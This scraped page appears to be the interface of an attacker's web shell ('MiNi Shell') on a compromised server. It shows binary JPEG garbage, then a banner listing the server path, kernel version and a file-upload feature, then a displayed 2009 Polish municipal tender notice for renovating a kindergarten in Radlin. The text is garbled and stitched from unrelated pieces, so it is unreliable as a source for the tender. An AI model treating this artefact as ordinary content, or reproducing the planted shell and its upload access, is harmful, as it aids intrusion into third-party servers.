JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090511/142170-N-2009.html

<p class="kh_header"><b>Radlin: Renowacja elewacji murów ceglanych wraz z wymianą stolarki okiennej w budynku przedszkola nr 2 w Radlinie przy ul. Mieleckiego 13 w Radlinie.</b><br>
<b>Numer ogłoszenia: 142170 - 2009; data zamieszczenia: 11.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Radlin , ul. Rymera 15, 44-310 Radlin, woj. śląskie, tel. 032 4590200, faks 032 4590205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radlin.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.um.radlin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Renowacja elewacji murów ceglanych wraz z wymianą stolarki okiennej w budynku przedszkola nr 2 w Radlinie przy ul. Mieleckiego 13 w Radlinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówieniem  objęty jest następujący zakres robót:
1. Renowacja elewacji 
roboty przygotowawcze - wygrodzenie i oznakowanie terenu robót, wykonanie daszków zabezpieczających nad wejściem, postawienie rusztowań zewnętrznych, zabezpieczenie budynku przed zalewaniem wodami opadowymi w trakcie prowadzenia robót,	
naprawa pęknięć i uzupełnienie ubytków w powierzchni cegły, oczyszczenie i uzupełnienie spoinowania.
renowacja -  chemiczne czyszczenie oraz zabezpieczenie (hydrofobizacja ) powierzchni  elewacji,  
malowanie farbą olejną elementów metalowych,
wywóz i utylizacja gruzu, 
2. Wymiana stolarki:
-	wykonanie wymiany okien drewnianych na okna z PCV wraz robotami towarzyszącymi  zgodnie z  stanem istniejącym i z załączonym zestawieniem stolarki okiennej (stolarka 	okienna  z PCV  w kolorze białym, profile okienne  przynajmniej 3-komorowe, przy zastosowaniu 	wkładów szybowych o wskaźniku 	U =1,1, (szyba bezpieczna przynajmniej B 02 obustronnie) według podziału określonego w zestawieniu stolarki, uchylno-rozwieralnej, z systemem 	mikrowentylacji i zamontowanymi nawiewnikami okiennymi); 
	 razem okien  -  51 szt. (w tym okna łukowe szt. 18, okna proste szt. 33),
wymiana podokienników wewnętrznych  na PCV o szer.30cm - szt. 40, 
-     skucie płytek  ceramicznych w wnękach okiennych,
uzupełnienie tynków na ościeżach i  wnękach okiennych,
uzupełnienie malowania na ościeżach okiennych,
wykonanie zewnętrznych parapetów z blachy ocynkowanej, powlekanej w kolorze brązowym o szer. 30 cm, 
-     oczyszczenie terenu z pozostałości  gruzu,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.21.00-1, 45.45.31.00-8, 45.42.00.00-7, 45.42.11.25-6, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wadium  należy  wnieść,  przed  upływem  terminu  składania  ofert, w  wysokości 2 000,00zł. (tzn. kwota  wadium musi wpłynąć na rachunek Zamawiającego przed terminem określonym w pkt X.1 SIWZ).
2. Wadium  może  być  wnoszone  w  jednej  lub  kilku  następujących  formach: 
a) Pieniądzu - należy  wpłacić przelewem na  konto  Zamawiającego,
UWAGA! ZMIANA NR RACHUNKU BANKOWEGO - nowy rachunek: Bank Spółdzielczy w Jastrzębiu-Zdroju nr  69 8470 0001 2001 0042 2365 0002  (poprzez pojęcie przelew Zamawiający rozumie udzieloną bankowi przez wykonawcę dyspozycję obciążenia jego rachunku kwotą wadium i uznania tą kwotą rachunku zamawiającego)                                
b) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych  lub poręczeniach  udzielanych  przez  podmioty,  o  których  mowa  w  art. 6b ust. 5 pkt 2 ustawy  z dnia  9  listopada  2000 r.  o  utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości ( tekst jednolity: Dz. U. z 2007 r.  nr 42 , poz. 275)  -  należy  złożyć w  Referacie Księgowości  Budżetowej ( pok. 203 ) Urzędu  Miasta  Radlin  ( w godz. 7.30 - 15.30 przed upływem terminu składania ofert określonym w pkt. IX.1 SIWZ  )  - z  terminem  ważności  co  najmniej  30 dni od  terminu  składania  ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie  zamówienia  mogą  ubiegać  się  Wykonawcy,  którzy spełnią następujące warunki:
   a. Posiadają  uprawnienia  do  wykonania  określonej  działalności  lub  czynności -  prowadzą       działalność gospodarczą w zakresie wykonywania robót ogólnobudowlanych - potwierdzone       aktualnym  odpisem  z właściwego  rejestru  albo  aktualnym  zaświadczeniem  o  wpisie  do       ewidencji działalności gospodarczej, wystawionymi  nie  wcześniej  niż  6 miesięcy przed  upływem        terminu składania ofert - jeżeli ofertę składa konsorcjum należy załączyć wymagany dokument  dotyczący każdego z członków konsorcjum oraz oświadczeniem (wzór zał. nr 2);
     b.  Posiadają  niezbędną  wiedzę  i  doświadczenie  do  wykonania  zamówienia - wykonali zamówienia o zakresie rzeczowym zbliżonym do przedmiotu zamówienia tj. co najmniej dwie roboty budowlane  obejmujące swoim zakresem czyszczenie elewacji o powierzchni min. 600m2 oraz dwie roboty na wymianę okien  o wartości nie mniejszej niż 60 000,00zł, potwierdzone wykazem wykonanych w ciągu ostatnich pięciu lat robót budowlanych (wzór zał. nr 3), jeżeli firma działa krócej, to z okresu działania firmy wraz z dokumentami, że roboty te zostały wykonane z należytą starannością oraz oświadczeniem (wzór zał. nr 2); 
    c. Dysponują potencjałem technicznym do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego - potwierdzone oświadczeniem (wzór zał. nr 2);
   d. Dysponują  osobami  zdolnymi  do  wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - tj. dysponują osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - potwierdzone wykazem osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia a także zakresu wykonywanych przez nich czynności lub pisemnym zobowiązaniem innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli wykonawca wykazał osoby, którymi będzie dysponował (wzór zał. nr 4)  uprawnienia budowlane wraz z aktualnym dokumentem stwierdzającym przynależność do IIB oraz oświadczeniem (wzór zał. nr 2);
   e. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  tj. - są  ubezpieczeni od odpowiedzialności cywilnej w  zakresie prowadzonej działalności na kwotę  minimum 200.000,00 zł - potwierdzone polisą, a w przypadku jej braku dokumentem potwierdzającym, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  wraz z dowodem ich opłacenia jeżeli fakt ten nie wynika z polisy lub dokumentu oraz oświadczeniem (wzór zał. nr 2);
   f. Nie podlegają wykluczeniu z postępowania na podstawie art. 22 upzp - potwierdzone  oświadczeniem (wzór zał. nr 2)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Kompletna oferta  powinna  zawierać:
a) Wypełniony  i  podpisany  druk  oferty  (wzór  -  zał. nr 1);
b) Oświadczenie o spełnieniu warunków art. 22 upzp (wzór- zał. nr 2) - w przypadku udziału konsorcjum, oświadczenie składa każdy z członków konsorcjum;
c) Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania -  wykonali zamówienia o zakresie rzeczowym zbliżonym do przedmiotu zamówienia tj. co najmniej dwie roboty budowlane obejmujące swoim zakresem czyszczenie elewacji o powierzchni min. 600m2 oraz dwie roboty na wymianę okien  o wartości nie mniejszej niż 60 000,00 zł wraz z dokumentami że roboty te zostały wykonane z należytą starannością (wzór  - zał. nr 3);
d) Wykaz  osób,  którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wzór - zał. nr 4) lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w ww. wykazie, wykonawca wskazał osoby, którymi będzie dysponował;
 e) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia,  tj. uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej wraz z aktualnym dokumentem stwierdzającym przynależność do Izby Inżynierów Budownictwa;
f  Aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenie  o  wpisie  do ewidencji działalności  gospodarczej,  wystawione  nie  wcześniej  niż  6 miesięcy przed  upływem terminu składania ofert - jeżeli ofertę składa konsorcjum należy załączyć wymagany dokument dotyczący każdego z członków konsorcjum;
g) Umowę regulującą współpracę podmiotów występujących wspólnie (w razie występowania spółki cywilnej) lub pismo w sprawie ustanowienia pełnomocnika - lidera, gdy do przetargu staje konsorcjum;
h)  Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w  zakresie prowadzonej  działalności w wysokości min. 200 000,00 zł, wraz z potwierdzeniem opłacenia, jeżeli ten fakt nie wynika z polisy lub innego dokumentu potwierdzającego ubezpieczenie;
i) Kopia dowodu wniesienia wadium.
j) Wyceniony przedmiar robót..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.radlin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Radlin, 44-310 Radlin, ul. Rymera 15, I piętro, pok. nr 201..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 09:15, miejsce: Sekretariat Urzędu Miasta Radlin, II piętro, pokój nr 301..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com